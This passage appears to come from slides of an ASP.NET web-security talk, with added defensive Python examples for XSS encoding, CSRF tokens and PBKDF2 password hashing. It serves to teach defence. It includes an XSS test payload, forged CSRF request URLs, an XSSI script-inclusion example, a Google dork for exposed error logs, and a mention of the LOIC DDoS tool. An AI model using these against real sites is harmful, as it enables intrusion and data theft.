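    """Same snippet, encoded for where the value ends up: it is HTML once written,
    so HTML-escape first; that text then sits inside a JS string, so JS-escape second."""
    return PREFIX + js_string_encode(html.escape(value, quote=True)) + SUFFIX


def is_inert(script):
    """Crude check for the demo: the injected part must contain no '<' (no new tag)
    and no '"' (cannot end the JS string literal)."""
    body = script[len(PREFIX):-len(SUFFIX)]
    return "<" not in body and '"' not in body


if __name__ == "__main__":
    payload = '</option><script>alert(1)</script>'   # constructed sample input
    print(option_script_unsafe(payload))              # breaks out of the option
    print(option_script(payload))                     # stays literal text
```

When the browser evaluates the encoded literal, `\u0026lt;` becomes `&lt;`, which the HTML parser renders as a visible `<` inside the option text rather than as markup.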
20. Built-In XSS Prevention Features (.NET)
• Request Validation
o ASP .NET Web Forms: <%@ Page ValidateRequest="true" %>
o ASP .NET MVC: Controller.ValidateRequest = true;
o <httpRuntime requestValidationMode="4.0" />
• Do not turn off request validation
o “Easy fix” for HTML editors
o Use HTML editors that HTML encode before submission
• Reliability
o Microsoft advice: Relying solely on built-in request validation is not enough
o No known vulnerabilities now (but not in the past)
• AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode()
o HttpUtility just ensures output does not break HTML
o Performance penalty is +0.1 ms/transaction
21. Content Security Policy
• HTTP Header
o Content-Security-Policy: script-src 'self'
• Features
o Whitelist sources of trusted content
o Blocks resources from untrusted locations (incl. inline scripts)
o Report of blocked resources
• Directives
o script-src; img-src; media-src; style-src; frame-src; connect-src
• Keywords
o 'none', 'self', 'unsafe-inline', 'unsafe-eval'
• Browser support
o CanIUse.com CSP?
23. Cross-Site Request Forgery (CSRF)
Def: Unauthorised commands transmitted from a user whom a website trusts
• Synonyms: One-click attack, Session riding
• Case
o User logs in to http://goodSite.com as usual
o http://evilHacker.com can
• POST new password in form to GoodSite.com
• GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker
o Authenticated because cookies are sent
• Impact
o EvilHacker.com cannot read DOM but can POST / GET
o Act on behalf of the user (i.e. payment)
o User access is blocked or stolen
24. Cross Site Scripting Inclusion (XSSI)
• Case
o Exploits <script> element exception to Same Origin Policy
o http://goodSite.com includes own <script> for AJAX request
o http://evilHacker.com includes the same script
• Authenticated because cookies are sent
o Server returns JSON wrapped in function call
<script type="application/javascript"
        src="http://goodSite.com/Svc/Get?callback=parseResponse"></script>
o SCRIPT evaluated in evilHacker.com context and JSON is stolen
parseResponse({"this":"is","json":"data"});
• Impact
o User data are stolen
• Prevention
o Check policy of script inclusion
25. CSRF Prevention & Mitigation
• NONCE token (URL, hidden field)
o Checked upon submission
o Protected by browser same origin policy
• User defined (password, CAPTCHA)
• Built-In (ASP.NET)
Page.ViewStateUserKey = Session.SessionID;
o Signs the ViewState with unique user key
• Built-In (ASP.NET MVC)
o HtmlHelper.AntiForgeryToken() - generates a hidden form field
o [ValidateAntiForgeryToken] attribute for controller validation
o NOT a single-use token
• HTTP POST makes attacks harder
o Cross domain POSTs can be limited (CORS)
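Added example of the session-bound nonce described above; it is not the presentation's or ASP.NET's code, but Python with a constructed request dict and hypothetical handler names. Like the MVC anti-forgery token it is tied to the session rather than single-use.

```python
import hashlib
import hmac
import secrets

# Constructed server-side key: generated once per deployment, never sent to clients.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id):
    """Token bound to the user's session, the idea behind
    Page.ViewStateUserKey = Session.SessionID: a keyed MAC over the session id,
    so a token minted for one session verifies for no other."""
    return hmac.new(SERVER_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def render_form(session_id):
    """What goodSite.com embeds in its own form: the hidden field carrying the token."""
    return '<input type="hidden" name="csrf" value="%s">' % csrf_token(session_id)


def verify_csrf(session_id, submitted):
    """Constant-time comparison of the hidden-field value against the expected token."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id), submitted)


def handle_payment(request):
    """request: constructed dict standing in for an HTTP POST. The cookie names the
    session (the browser sends it automatically, which is what CSRF relies on); the
    form carries the token only if the page that built it was served to this user."""
    session_id = request.get("cookies", {}).get("session")
    if session_id is None:
        return 401                      # not logged in
    if not verify_csrf(session_id, request.get("form", {}).get("csrf")):
        return 403                      # forged or foreign form
    return 200                          # act on behalf of the user


if __name__ == "__main__":
    good = {"cookies": {"session": "sess-A"},
            "form": {"csrf": csrf_token("sess-A"), "amount": "1000"}}
    forged = {"cookies": {"session": "sess-A"}, "form": {"amount": "1000"}}
    print(handle_payment(good), handle_payment(forged))   # 200 403
```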
27. Parameter Tampering
Def: Parameters changed in unintended way
Common reasons
• Query string; Hidden form fields;
• Data-channel interception (M-i-t-M attack)
Common Mistakes
• Client side validation only
• Mismatch with predefined set of values
• Not validated access to entities on server (i.e. EntityId=???)
• Unprotected data sent to client
o Query strings; JavaScript parameters
28. Tampering Prevention & Mitigation
• Built-In (ASP.NET MVC) - None
• Built-In (ASP.NET)
• ViewState
o Not encrypted by default (Binary serialized, Base64 Encoded)
o Do not turn EnableViewstateMac off (Web Farm, X-domain POST)
• Event Validation
o "Invalid postback or callback argument…"
o Not encrypted (Binary serialized, Base64 Encoded)
o Do not turn event validation off
o Register for event validation
protected override void Render(HtmlTextWriter writer) {
    …
    Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, "John");
}
30. Encryption
• Protects sensitive data (if stolen)
o Credentials; Auth tokens; Configuration;
• SQL data encryption
o EncryptByPassPhrase
o EncryptByCert
o EncryptByKey
• Application level
o AesCryptoServiceProvider, RijndaelManaged
o TripleDESCryptoServiceProvider
• Connection string encryption
o Machine specific encryption after deploy
aspnet_regiis -pe "connectionStrings" -app /[appname]
o Decryption done automatically
31. Hashing
• Irreversible function (MD5, SHA1, SHA256)
o MD5 generator: http://www.md5.cz/
o Output is smaller than the data
• Collisions are possible
• Usage
o Assure information was not changed (tampered)
o Protect passwords
• Compromising
o A good algorithm is still compromised by weak passwords
o Brute force (GPU)
o Precalculated “Rainbow tables” (Dictionary attack)
• http://www.hashkiller.co.uk/md5-decrypter.aspx
32. Protecting Hashes
• Random Salt
o [SecretText][Salt] -> [Hash]
o Changes hash value
o Invalidates rainbow tables
o Slows down brute force attacks
• Complex passwords
• Slow algorithms
• Key stretching (Rfc2898DeriveBytes class)
U1 = PRF(Password, Salt)
U2 = PRF(Password, U1)
...
Uc = PRF(Password, Uc-1)
• Outsource sensitive data storage (if possible)
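Added example, not from the presentation: the U1..Uc chain above carried through in Python as RFC 2898 PBKDF2 with HMAC-SHA1 (the default PRF of Rfc2898DeriveBytes) and cross-checked against hashlib; the sample password, salt and iteration counts are constructed.

```python
import hashlib
import hmac
import os

HASH_LEN = 20  # HMAC-SHA1 output size, one PBKDF2 block


def prf(password, data):
    """PRF(Password, data) from the slide: HMAC-SHA1 keyed with the password."""
    return hmac.new(password, data, hashlib.sha1).digest()


def pbkdf2_block(password, salt, iterations, block_index=1):
    """The slide's chain U1 = PRF(Password, Salt), U2 = PRF(Password, U1), ...,
    Uc = PRF(Password, Uc-1), written out as RFC 2898 specifies it: the salt is
    suffixed with the 4-byte block index, and the output is U1 xor U2 xor ... xor Uc
    (the XOR is part of the standard but not shown on the slide)."""
    u = prf(password, salt + block_index.to_bytes(4, "big"))
    acc = bytearray(u)
    for _ in range(iterations - 1):
        u = prf(password, u)
        for j in range(HASH_LEN):
            acc[j] ^= u[j]
    return bytes(acc)


def matches_stdlib(password, salt, iterations):
    """Cross-check the hand-written chain against hashlib.pbkdf2_hmac."""
    expected = hashlib.pbkdf2_hmac("sha1", password, salt, iterations, HASH_LEN)
    return pbkdf2_block(password, salt, iterations) == expected


def hash_password(password, iterations=10000, salt=None):
    """Random salt + key stretching; returns (salt, hash) to store together.
    salt may be supplied for tests; leave it None in practice."""
    if salt is None:
        salt = os.urandom(16)
    return salt, pbkdf2_block(password.encode("utf-8"), salt, iterations)


def verify_password(password, salt, stored, iterations=10000):
    candidate = pbkdf2_block(password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    # RFC 6070 test vector: PBKDF2-HMAC-SHA1("password", "salt", c=2, 20 bytes)
    print(pbkdf2_block(b"password", b"salt", 2).hex())
    salt, h = hash_password("correct horse", 1000)
    print(verify_password("correct horse", salt, h, 1000))   # True
```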
33. Information Leakage
• Loss of sensitive data
o Display trace and log information
o Display raw error messages
o Google it: inurl: elmah.axd aspxauth
o Attacker can profile application and select appropriate attack
• Mitigation
o Custom error pages <customErrors mode="On" defaultRedirect="Error.aspx">
o Turn off tracing
• Retail mode <deployment retail="true"/>
o Set in machine.config for the whole server
o Sets customErrors mode="On", debug="false"
o Trace information is not displayed
• Test
35. SSL / TLS
• HTTP over SSL prevents packet sniffing
• Force SSL for the entire site
o Or at least for credentials interchange
• ASP.NET MVC: RequireHttpsAttribute
o Redirects Request to HTTPS scheme
• ASP.NET Web Forms
o Requires custom code
o https://code.google.com/p/securityswitch/
<securitySwitch mode="RemoteOnly">
<paths>
<add path="~/Login.aspx" />
</paths>
</securitySwitch>
37. Denial of Service Attack
DDoS
• Anonymous?!
o LOIC (Hive mode)
o TOR Anonymity Project
• Hash DoS (since 2003)
o POST params stored in a hash table (keys chosen to collide)
o Too many collisions = 100% CPU
o Patch: Block POST of >1000 form fields
Prevention & Mitigation
• Dynamic IP restrictions IIS extension
o http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions
• Good logging and diagnostics are essential
39. Takeaways
• Guidelines & Code Labs
o Open Web Application Security Project www.owasp.org
o Web App Exploits and Defenses google-gruyere
o 2013 Top 10 Web Security Vulnerabilities Top_10_2013
o 2011 Top 25 Most Dangerous Software Errors cwe.mitre.org/top25
• Articles
o Hack-proofing ASP.NET Web Applications Adam Tuliper
o Hash DDoS Hash-Dos-Attack
• .NET Source Code referencesource.microsoft.com
• Tools
o ASafaWeb Analyser asafaweb.com
o Website and Web Server Security Testing www.beyondsecurity.com
40. Upcoming events
ISTA Conference 26-27 November
http://istabg.org/
Stay tuned for 2015:
Azure Bootcamp http://azure-camp.eu/
UXify Bulgaria http://uxify.org/
SQLSaturday https://www.sqlsaturday.com/
and more js.next();
41. Thanks to our Sponsors:
Diamond Sponsor:
Hosting partner:
Gold Sponsors:
Silver Sponsors:
Technological Partners:
Swag Sponsors:
Media Partners: